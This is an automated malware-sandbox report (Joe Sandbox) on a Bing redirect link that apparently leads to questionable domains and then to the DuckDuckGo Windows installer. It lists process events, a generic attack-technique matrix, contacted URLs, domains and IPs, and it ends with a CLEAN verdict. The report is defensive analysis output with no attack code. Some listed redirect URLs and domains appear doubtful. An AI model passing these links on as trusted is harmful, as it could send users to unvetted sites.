Source: Binary string: Z/WindowsBrowser/WindowsBrowser.Common.Wpf.pdbd/WindowsBrowser/es/UIAutomationTypes.resources.dllb/WindowsBrowser/api-ms-win-core-fibers-l1-1-0.dllb/WindowsBrowser/zh-Hans/System.Xaml.resources.dlld/WindowsBrowser/Microsoft.AspNetCore.Mvc.Razor.dllb/WindowsBrowser/System.Diagnostics.StackTrace.dll/WindowsBrowser/WindowsBrowser.NetworkProtection.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AY.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: AppInstaller.exe, 00000008.00000002.3030663037.0000019EC8FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory11
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
Process Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/2%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://feedback.googleusercontent.com/resources/annotator.css0%URL Reputationsafe
https://apis.google.com/js/client.js0%URL Reputationsafe
https://support.google.com0%URL Reputationsafe
http://localhost.proxy.googlers.com/inapp/0%URL Reputationsafe
https://stagingqual-feedback-pa-googleapis.sandbox.google.com0%URL Reputationsafe
https://pay.google.com/gp/v/widget/save0%URL Reputationsafe
https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/0%URL Reputationsafe
https://developers.google.com/0%URL Reputationsafe
https://developers.google.com/identity/gsi/web/guides/gis-migration)0%URL Reputationsafe
https://sandbox.google.com/inapp/%0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%URL Reputationsafe
https://apis.google.com/js/api.js0%URL Reputationsafe
https://feedback2-test.corp.google.com/tools/feedback/%0%URL Reputationsafe
https://asx-frontend-autopush.corp.google.de/tools/feedback/0%URL Reputationsafe
https://asx-frontend-autopush.corp.google.com/inapp/0%URL Reputationsafe
https://feedback.googleusercontent.com/resources/render_frame2.html0%URL Reputationsafe
https://sandbox.google.com/tools/feedback/%0%URL Reputationsafe
https://support.google.com/inapp/%0%URL Reputationsafe
https://support.google.com/inapp/0%URL Reputationsafe
https://asx-frontend-autopush.corp.google.co.uk/inapp/0%URL Reputationsafe
https://apis.google.com0%URL Reputationsafe
https://asx-frontend-autopush.corp.youtube.com/tools/feedback/0%URL Reputationsafe
https://domains.google.com/suggest/flow0%URL Reputationsafe
https://feedback2-test.corp.google.com/inapp/%0%URL Reputationsafe
https://duckduckgo.com/_next/static/chunks/pages/%5Blocale%5D-a03851f118d21af9.js0%VirustotalBrowse
https://apis.google.com/js/googleapis.proxy.js0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/81125-b74d1b6f4908497b.js0%VirustotalBrowse
https://apis.google.com/js/googleapis.proxy.js?onload=startup0%VirustotalBrowse
https://duckduckgo.com/static-assets/font/ProximaNova-ExtraBold-webfont.woff20%VirustotalBrowse
https://duckduckgo.com/_next/static/css/df680b227823b9ab.css0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/4770-0c9bfd7371e35a41.js0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/pages/_app-a22172a0a3988563.js0%VirustotalBrowse
https://www.google.com/shopping/customerreviews/optin?usegapi=10%VirustotalBrowse
https://www.google.com/tools/feedback0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/webpack-729a400fd7e48c20.js0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/53343-e1b28b68883ff9df.js0%VirustotalBrowse
https://duckduckgo.com/_next/static/chunks/49224-2de3d7ae3b973557.js0%VirustotalBrowse
https://developer.chrome.com/docs/webstore/program-policies/limited-use/0%VirustotalBrowse
https://duckduckgo.com/_next/static/media/firefox-lg.8efad702.png0%VirustotalBrowse
https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle0%VirustotalBrowse
https://duckduckgo.com/favicon.ico0%VirustotalBrowse
https://www.google.com/tools/feedback/0%VirustotalBrowse
https://duckduckgo.com/_next/static/media/play-store.e5d5ed36.png0%VirustotalBrowse
https://www.youtube.com/subscribe_embed?usegapi=10%VirustotalBrowse
https://duckduckgo.com/static-assets/font/ProximaNova-Bold-webfont.woff20%VirustotalBrowse
https://plus.google.com0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
scone-pa.clients6.google.com
142.250.185.74
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      chromewebstore.google.com
      142.250.184.206
      truefalse
        unknown
        plus.l.google.com
        142.250.181.238
        truefalse
          unknown
          duckduckgo.com
          40.114.177.156
          truefalse
            unknown
            lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ru
            172.67.197.235
            truefalse
              unknown
              fp2e7a.wpc.phicdn.net
              192.229.221.95
              truefalse
                unknown
                bg.microsoft.map.fastly.net
                199.232.210.172
                truefalse
                  unknown
                  code.jquery.com
                  151.101.194.137
                  truefalse
                    unknown
                    www3.l.google.com
                    142.250.184.206
                    truefalse
                      unknown
                      play.google.com
                      142.250.74.206
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          unknown
                          challenges.cloudflare.com
                          104.18.94.41
                          truefalse
                            unknown
                            www.google.com
                            142.250.186.132
                            truefalse
                              unknown
                              external-content.duckduckgo.com
                              40.114.178.124
                              truefalse
                                unknown
                                www.444317.com
                                188.114.96.3
                                truefalse
                                  unknown
                                  gzevp.castragouse.com
                                  188.114.97.3
                                  truefalse
                                    unknown
                                    googlehosted.l.googleusercontent.com
                                    142.250.186.65
                                    truefalse
                                      unknown
                                      s-part-0032.t-0009.t-msedge.net
                                      13.107.246.60
                                      truefalse
                                        unknown
                                        staticcdn.duckduckgo.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          lh3.googleusercontent.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            improving.duckduckgo.com
                                            unknown
                                            unknownfalse
                                              unknown
                                              chrome.google.com
                                              unknown
                                              unknownfalse
                                                unknown
                                                apis.google.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://improving.duckduckgo.com/t/page_home_scroll?9204079&b=chrome&d=d&l=en&p=windows&atb=v450-6&pre_va=_&pre_atbva=_&atbi=true&i=false&ak=false&mobileHomepageBannerDismissed=falsefalse
                                                    unknown
                                                    https://duckduckgo.com/static-assets/font/ProximaNova-ExtraBold-webfont.woff2falseunknown
                                                    https://apis.google.com/js/googleapis.proxy.js?onload=startupfalseunknown
                                                    https://duckduckgo.com/_next/static/chunks/pages/%5Blocale%5D-a03851f118d21af9.jsfalseunknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cf2ed9a6c2641de&lang=autofalse
                                                      unknown
                                                      https://lh3.googleusercontent.com/LtBvUp3Og39KJjwrHuvaqaooDAjOS1drA8yvKNS4X8507y1sm5dYLRtDvr8ddiRjaXUMPIPwrVtWgBWrYUO5y8QM7A=s1280-w1280-h800false
                                                        unknown
                                                        https://duckduckgo.com/_next/static/chunks/81125-b74d1b6f4908497b.jsfalseunknown
                                                        https://lh3.googleusercontent.com/a-/ALV-UjVXxMbnDH06Mw7_K-VroRytYePj4dzwTxv4lYqsxovxXe5qBnjv=s48-w48-h48false
                                                          unknown
                                                          https://duckduckgo.com/_next/static/css/df680b227823b9ab.cssfalseunknown
                                                          https://lh3.googleusercontent.com/a-/ALV-UjWuDGySyWhbyLJdWT_0QCizAbEyFKjQ4lS3MMUOnV1yYX0ks1be=s48-w48-h48false
                                                            unknown
                                                            https://duckduckgo.com/_next/static/chunks/4770-0c9bfd7371e35a41.jsfalseunknown
                                                            https://duckduckgo.com/_next/static/chunks/pages/_app-a22172a0a3988563.jsfalseunknown
                                                            https://duckduckgo.com/static-assets/backgrounds/about-bg-sm.jpgfalse
                                                              unknown
                                                              https://duckduckgo.com/_next/data/kMKb7Bj0jhFmsUIWJjIQE/about.jsonfalse
                                                                unknown
                                                                https://duckduckgo.com/static-assets/image/windows/install-step-03-welcome.pngfalse
                                                                  unknown
                                                                  https://staticcdn.duckduckgo.com/windows-desktop-browser/installer/funnel_home___details/DuckDuckGo.appinstallerfalse
                                                                    unknown
                                                                    https://duckduckgo.com/windows?origin=funnel_home___detailsfalse
                                                                      unknown
                                                                      https://lh3.googleusercontent.com/BK9B47UjAvyI4GPqmo1kqIAN4fmtgKrJflhcZ0lXYHElpgl9G2N2951auaEIh8HEj3H03nzA6wBWP-j313NhWe55HA=s275-w275-h175false
                                                                        unknown
                                                                        https://duckduckgo.com/_next/static/chunks/49224-2de3d7ae3b973557.jsfalseunknown
                                                                        https://duckduckgo.com/_next/static/chunks/webpack-729a400fd7e48c20.jsfalseunknown
                                                                        https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.pngfalse
                                                                          unknown
                                                                          https://staticcdn.duckduckgo.com/windows-desktop-browser/installer/funnel_home___hero/DuckDuckGo.appinstallerfalse
                                                                            unknown
                                                                            https://gzevp.castragouse.com/favicon.icofalse
                                                                              unknown
                                                                              https://duckduckgo.com/_next/static/chunks/53343-e1b28b68883ff9df.jsfalseunknown
                                                                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/false
                                                                                unknown
                                                                                https://duckduckgo.com/static-assets/backgrounds/about-bg-md-lg.jpgfalse
                                                                                  unknown
                                                                                  https://duckduckgo.com/_next/static/media/firefox-lg.8efad702.pngfalseunknown
                                                                                  https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.pngfalse
                                                                                    unknown
                                                                                    https://duckduckgo.com/_next/static/media/play-store.e5d5ed36.pngfalseunknown
                                                                                    https://improving.duckduckgo.com/t/atb_home_sad_impression?5699345&b=chrome&d=d&l=en&p=windows&atb=v450-6&pre_va=_&pre_atbva=_&atbi=true&i=false&locale=en&origin=funnel_homefalse
                                                                                      unknown
                                                                                      https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundlefalseunknown
                                                                                      https://duckduckgo.com/favicon.icofalseunknown
                                                                                      https://duckduckgo.com/static-assets/image/windows/install-step-02.pngfalse
                                                                                        unknown
                                                                                        https://lh3.googleusercontent.com/04Pvf_aHNL0yjC-7q52a48eZichJB2J9m-q_JACGVUbjDQDlVdCVIVy2g24n79GsYTcm8fxk07rhPVvQHDRXzuV9Dg=s192-w192-h120false
                                                                                          unknown
                                                                                          https://duckduckgo.com/static-assets/font/ProximaNova-Bold-webfont.woff2falseunknown
                                                                                          https://duckduckgo.com/_next/static/chunks/69706-4c02de239da444ff.jsfalse
                                                                                            unknown
                                                                                            https://duckduckgo.com/static-assets/backgrounds/about-fg-dark-md-lg.svgfalse
                                                                                              unknown
                                                                                              https://lh3.googleusercontent.com/cw6loShVaHB1WmJV3GTr3AWscNoZeSvxksONwnp8n7AKazCv1k-rcjWEp2Dta7VyElFGR7BzspOehuSZkklLCd66=s60false
                                                                                                unknown
                                                                                                https://duckduckgo.com/_next/static/kMKb7Bj0jhFmsUIWJjIQE/_ssgManifest.jsfalse
                                                                                                  unknown
                                                                                                  https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                                                                                    unknown
                                                                                                    https://duckduckgo.com/static-assets/backgrounds/about-bg-dark-md-lg.jpgfalse
                                                                                                      unknown
                                                                                                      https://duckduckgo.com/static-assets/backgrounds/grain.pngfalse
                                                                                                        unknown
                                                                                                        https://chromewebstore.google.com/detail/duckduckgo-privacy-essent/bkdgflcldnnnapblkhphbgpggdiikppgfalse
                                                                                                          unknown
                                                                                                          https://improving.duckduckgo.com/t/atb_home_sad_impression?8226573&b=chrome&d=d&l=en&p=windows&atb=v450-6&pre_va=_&pre_atbva=_&atbi=true&i=false&locale=en&origin=funnel_homefalse
                                                                                                            unknown
                                                                                                            https://lh3.googleusercontent.com/Qf59jYhfbx2rt-mNWNBXrLHH8ueA0-Hittc8HJ5MxVZXf7-NUATuHOvp-ppj_t7Q1P_WZpeVE5XSvfjf5SVVmjPK=s60false
                                                                                                              unknown
                                                                                                              https://lh3.googleusercontent.com/gwvwew_KoIj3OsVAqLa2y4UkHSGJm_hp9BMkEAeb15HEyZHEmXTGVrCN4VB-mElofPRd8dlXSsFHbJPnYu2pbRr9Lg=s192-w192-h120false
                                                                                                                unknown
                                                                                                                https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.pngfalse
                                                                                                                  unknown
                                                                                                                  https://duckduckgo.com/static-assets/backgrounds/about-bg-dark-sm.jpgfalse
                                                                                                                    unknown
                                                                                                                    https://duckduckgo.com/static-assets/backgrounds/about-fg-sm.svgfalse
                                                                                                                      unknown
                                                                                                                      https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.pngfalse
                                                                                                                        unknown
                                                                                                                        https://lh3.googleusercontent.com/a-/ALV-UjUBDI4MyIvJIB5vN1VD0pk5tN_Np7FJQoQn_-355hQsgjo6D5U=s48-w48-h48false
                                                                                                                          unknown
                                                                                                                          https://duckduckgo.com/_next/static/css/9cf77fa71faeba25.cssfalse
                                                                                                                            unknown
                                                                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                                                                                              unknown
                                                                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82false
                                                                                                                                unknown
                                                                                                                                https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_1false
                                                                                                                                  unknown
                                                                                                                                  https://duckduckgo.com/_next/static/chunks/41966-c9d76895b4f9358f.jsfalse
                                                                                                                                    unknown
                                                                                                                                    https://duckduckgo.com/_next/static/chunks/79567-e254aebee0b28943.jsfalse
                                                                                                                                      unknown
                                                                                                                                      https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.pngfalse
                                                                                                                                        unknown
                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                        https://stats.g.doubleclick.net/g/collectchromecache_254.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://feedback.googleusercontent.com/resources/annotator.csschromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://apis.google.com/js/client.jschromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://support.google.comchromecache_351.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://apis.google.com/js/googleapis.proxy.jschromecache_246.2.drfalseunknown
                                                                                                                                        http://localhost.proxy.googlers.com/inapp/chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://stagingqual-feedback-pa-googleapis.sandbox.google.comchromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://pay.google.com/gp/v/widget/savechromecache_246.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.google.com/shopping/customerreviews/optin?usegapi=1chromecache_206.2.dr, chromecache_246.2.drfalseunknown
                                                                                                                                        https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://developers.google.com/chromecache_410.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://developers.google.com/identity/gsi/web/guides/gis-migration)chromecache_410.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.google.com/tools/feedbackchromecache_341.2.drfalseunknown
                                                                                                                                        https://developer.chrome.com/docs/webstore/program-policies/limited-use/chromecache_351.2.drfalseunknown
                                                                                                                                        https://sandbox.google.com/inapp/%chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://apis.google.com/js/api.jschromecache_288.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.google.com/tools/feedback/chromecache_341.2.drfalseunknown
                                                                                                                                        https://www.youtube.com/subscribe_embed?usegapi=1chromecache_206.2.dr, chromecache_246.2.drfalseunknown
                                                                                                                                        https://feedback2-test.corp.google.com/tools/feedback/%chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://plus.google.comchromecache_429.2.dr, chromecache_246.2.drfalseunknown
                                                                                                                                        https://asx-frontend-autopush.corp.google.de/tools/feedback/chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://asx-frontend-autopush.corp.google.com/inapp/chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://feedback.googleusercontent.com/resources/render_frame2.htmlchromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://sandbox.google.com/tools/feedback/%chromecache_341.2.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://play.google.com/work/embedded/search?usegapi=1&usegapi=1chromecache_206.2.dr, chromecache_246.2.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.dnb.com/duns.htmlchromecache_272.2.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://play.google.comchromecache_351.2.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.google.com/log?format=json&hasfast=truechromecache_288.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://support.google.com/inapp/%chromecache_341.2.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://staticcdn.duckduckgo.com/ser/Microsoft.Win32.SystemEvents.dllAppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.google.com/shopping/customerreviews/badge?usegapi=1chromecache_206.2.dr, chromecache_246.2.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://staticcdn.duckduckgo.com/d5c04536-5379-4709-8d19-d13fdd456ff6/installer/funnel_home___hero/DDuckDuckGo.appinstaller.crdownload.0.dr, chromecache_406.2.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://drive.google.com/savetodrivebutton?usegapi=1chromecache_206.2.dr, chromecache_246.2.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://support.google.com/inapp/chromecache_341.2.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://asx-frontend-autopush.corp.google.co.uk/inapp/chromecache_341.2.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://apis.google.comchromecache_246.2.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://staticcdn.duckduckgo.com/sixbundleAppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.google.com/chrome/?brand=GGRF&utm_source=google.com&utm_medium=material-callout&utm_campchromecache_351.2.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://asx-frontend-autopush.corp.youtube.com/tools/feedback/chromecache_341.2.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://domains.google.com/suggest/flowchromecache_214.2.dr, chromecache_300.2.dr, chromecache_429.2.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://feedback2-test.corp.google.com/inapp/%chromecache_341.2.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            142.250.74.206
                                                                                                                                                            play.google.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            172.217.18.14
                                                                                                                                                            unknownUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            104.18.94.41
                                                                                                                                                            challenges.cloudflare.comUnited States
                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                            142.250.181.238
                                                                                                                                                            plus.l.google.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            172.67.197.235
                                                                                                                                                            lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ruUnited States
                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                            142.250.186.132
                                                                                                                                                            www.google.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            40.114.178.124
                                                                                                                                                            external-content.duckduckgo.comUnited States
                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                            151.101.194.137
                                                                                                                                                            code.jquery.comUnited States
                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                            35.190.80.1
                                                                                                                                                            a.nel.cloudflare.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            142.250.184.206
                                                                                                                                                            chromewebstore.google.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            40.114.177.156
                                                                                                                                                            duckduckgo.comUnited States
                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                            239.255.255.250
                                                                                                                                                            unknownReserved
                                                                                                                                                            unknownunknownfalse
                                                                                                                                                            188.114.97.3
                                                                                                                                                            gzevp.castragouse.comEuropean Union
                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                            104.17.25.14
                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                            142.250.186.65
                                                                                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                            IP
                                                                                                                                                            192.168.2.5
                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                            Analysis ID:1528624
                                                                                                                                                            Start date and time:2024-10-08 05:07:41 +02:00
                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 4m 28s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                                                            Sample URL:https://www.bing.com/ck/a?!&&p=4ed30224ac809bc0JmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MQ&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cDovL3d3dy40NDQzMTcuY29tLw#aHR0cHM6Ly9nWmV2UC5jYXN0cmFnb3VzZS5jb20vZnpGQS8=/
                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                            Number of analysed new started processes analysed:12
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:CLEAN
                                                                                                                                                            Classification:clean3.win@33/401@53/16
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Browse: https://duckduckgo.com/windows?origin=funnel_home___hero
                                                                                                                                                            • Browse: https://duckduckgo.com/#features
                                                                                                                                                            • Browse: https://duckduckgo.com/about
                                                                                                                                                            • Browse: https://duckduckgo.com/windows?origin=funnel_home___details
